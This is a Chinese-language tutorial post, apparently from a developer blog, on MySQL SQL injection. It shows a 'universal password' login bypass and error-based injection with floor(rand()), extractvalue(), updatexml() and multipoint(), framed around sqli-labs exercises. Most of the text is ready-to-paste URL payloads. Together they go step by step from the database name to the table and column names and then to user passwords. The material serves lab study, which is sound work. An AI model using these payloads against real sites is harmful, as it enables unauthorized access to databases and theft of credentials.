本文详细探讨了如何利用`rand()`函数和报错注入技巧在MySQL中执行SQL操作,包括获取数据库信息、表名和列名,以及通过组合函数实现动态查询。通过实例展示了如何通过错误处理机制进行数据泄露和操纵。
'or'1'='1'#
'or'1'='1'--+
第一个单引号和等号右边自带的一个引号闭合了,然后用or形成永正 有可能会把数据库的所有内容都回显出来
然后注释符号把右边自带的引号也注释掉了 一般登录成功的账号也是数据库的第一个账号
万能密码是一种比较低级的漏洞,有概率通过输入这种的万能语句从而登录成功!
------------------------
------------------------
报错注入未必要and or也是可以执行报错函数注入的
知识储备:
select * from table1;
select count(*) from table1; //计算一下选取出来的结果的数量
select rand(); //rand 可以生成一个随机数(0-1)
select rand()*2; //个位要么是0 要么是1
select floor(1.56); //向下取整 四舍五不入
select floor(rand()*2); //取一个随机0-1的整数 即0或者1
select floor(rand()*2)a; //给前面的语句取一个别名叫a 这样显示的时候第一行就不会那么冗杂了
select * from table1 group by id; //将内容以id列进行分组输出
select concat(1,2,3); //将几个逗号间的内容拼接起来
select concat(1,2,3); //字符拼接 123
select password,count(*) as num from table1 group by password; //统计不同密码有多少个 统计数据命名为num 顺便按照password分组
0x3a //是十六进制冒号":"的意思
select concat(0x3a,0x3a,"haha"); // ::haha
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a; // ::库名::
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a; //库名后面再加一个随机数
select 'haha' from table1; //会显示n个haha 数据库有n个内容就有n个haha
select floor(rand()*2)a from table1; //会出现n个随机的0或者1
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
//如果不用别名 原始句子是:
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));
Mysql的rand函数有漏洞 rand函数每次出现都会重新计算一次
select count(*) from table1;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select count(*) from information_schema.columns;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,1);
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,0);
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));
//先令其产生随机数 然后用count去计算随机数 还要用a对其进行分组排列
//如果前面0和1都出现了,那么排列0或者1都可以 如果前面随机数都是出现0 而我们要让其以1来排序 就会出错。
//group by a 可以把a替换为前面的concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) 是等价的
//前后不同的时候排序就会报错
//本质 group by a是按照a排序,a里面只有0,1 且随机。但是总会存在两个0,两个1的情况
在mysql官方解释里,rand函数每次出现都会重新计算一次,所以a这个别名的内容和前面的结果是未必相同的
报错注入的适用情况:如果输入正确会查数据库但是不显示东西,输入错误就会报错
例题:sqli-labs T5 T6 (是有运气成功的 不断尝试即可 因为随机的问题)
方法1:floor() 函数
?id=2' --+ //可以判断出闭合
?id=-2' union select 1,2,3 --+ //没有报错位
//暴露数据库的库名
?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
//暴露数据库的表名
?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
方法2: extractvalue() 函数
0x7e表示十六进制的符号 "~”
id=2' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
方法3:updatexml() 函数
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
方法4:multipoint() 函数 (目前存在问题,待后续更新!)
id=2' and multipoint((select * from (select * from (select database())a)b)) --+
报错注入
小知识:select count(*) from table1;计算多少条数据select rand();生成随机数0-1select floor(1.2);向下取整select floor(rand()*2);生成0/1随机数select floor(rand()*2)a;取一个别名select * from table1 group by id;以id来进行分组select concat(1,2,3);字符拼接select password,count(*) as num from table1 group by password;统计不同密码有多少个,统计数据命名为num,顺便按照password进行分组0x3a = :select concat('haha',0x3a,'nihao');输出haha:nihao----------select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;::库名::select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a;select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));mysql官方说:rand函数每次出现都会重新计算一次select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from table1;select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;group by a是按a排序,a里只有0,1,并且随机!总有一天会出现2个0,2个1实战:id=1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b) --+id=1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b) --+?id=1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b) --+hex不需要加任何东西简单高效' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
floor函数进行报错注入:
注出所有表http://test?id=1' and (select 1 from (select count(*),concat(((select (schema_name) from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -http://test?id=2'and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -当前数据库http://test?id=2' and (select 1 from (select count(*),concat(((select concat(database(),';'))),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -当前数据库的表http://test?id=2' and (select 1 from (select count(*),concat(((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -列名http://test?id=2' and (select 1 from (select count(*),concat(((select concat(column_name,';') from information_schema.columns where table_name='users' limit 5,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -报字段http://test?id=2' and (select 1 from (select count(*),concat(((select concat(password,';') from users limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
